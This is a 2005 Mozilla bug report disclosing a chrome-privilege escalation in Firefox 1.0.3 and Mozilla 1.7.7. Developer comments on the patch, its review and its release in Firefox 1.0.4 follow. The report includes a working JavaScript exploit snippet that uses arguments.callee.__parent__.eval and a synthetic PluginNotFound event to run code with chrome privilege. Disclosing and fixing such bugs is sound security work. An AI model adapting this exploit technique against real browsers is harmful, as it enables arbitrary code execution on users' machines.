User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 Firefox 1.0.3: missingPluginInstaller.prototype.newMissingPlugin (in browser.js) is another event handler that can be used to make chrome access non-DOM JS property (related to Bug 289961). Mozilla 1.7.7: hrefForClickEvent (in contentAreaClick.js) is the function that can be used to make chrome access non-DOM JS property (related to Bug 290324). There is the way to circumvent the fix represented in bug 289074 comment 79. The code in Script object can access |arguments.callee.__parent__| that is the chrome window, and |arguments.callee.__parent__.eval()| is executed with chrome privilege. Exploit: var scriptCode = "arguments.callee.__parent__.eval('" + MALICIOUS_CODE + "');'';"; var script = (function() { function x() { new Object(); } return new Script(scriptCode); })(); document.body.__defineGetter__("type", script); var event = document.createEvent("Events"); event.initEvent("PluginNotFound", true, true); document.body.dispatchEvent(event); note: It is important that how to create Script object. A, B, and C cause this error: "Error: arguments is not defined". I don't know why D can access |arguments|. A) var script = new Script(scriptCode); B) var script = (function() { return new Script(scriptCode); })(); C) var script = (function() { function x() { "a"; } return new Script(scriptCode); })(); D) // any Object (window, document, new Array(), ...) var anyObj = new Object(); var script = (function() { function x() { anyObj; } return new Script(scriptCode); })(); I have confirmed that the following testcases work in: [Firefox] Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 [Mozilla Suite] Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Reproducible: Always Steps to Reproduce:

for Firefox/1.0.3

for Mozilla/1.7.7

each of the ways to create Script object

Testcase 1 is quite clever. Another bounty for moz_bug_r_a4! The patch in bug 290324 stops testcase 2. Testcase 3 merely shows how to get an outer function invocation to have an activation (Call in SpiderMonkey) object: nest an inner function that uses a non-local identifier. /be

(In reply to comment #4) > The patch in bug 290324 stops testcase 2. No, it's the suite version of testcase 1.

Er, dbaron points out that testcase 2 is for the suite. It's the suite version of testcase 1, I guess. More tomorrow. Thanks again, moz_bug_r_a4. /be

the more js can interact with chrome, the more exploits. especially if chrome executes js.

Comment on attachment 181234 [details] [diff] [review] fix jst, feel free to review too. /be

Comment on attachment 181234 [details] [diff] [review] fix r=shaver

Thanks to bz for some productive discussion, part of which suggested this patch. /be

Comment on attachment 181234 [details] [diff] [review] fix I really don't understand this anymore, but sr=dbaron.

Comment on attachment 181234 [details] [diff] [review] fix Got dveditz and drivers approval on IRC. Checking in, with the same change to obj_eval (indirect call error). /be

Checked into branches. /be

other than the attached test cases, are there other areas or things we could test to ensure that this didn't regress anything? thanks!

In Firefox 1.0.4/winxp, I am getting the following for testcase 3: A) ReferenceError: arguments is not defined B) ReferenceError: arguments is not defined C) ReferenceError: arguments is not defined D) [object Object] was D) supposed to be fixed?

Clearing security flag from announced vulnerabilities fixed in Firefox 1.0.4/Mozilla 1.7.8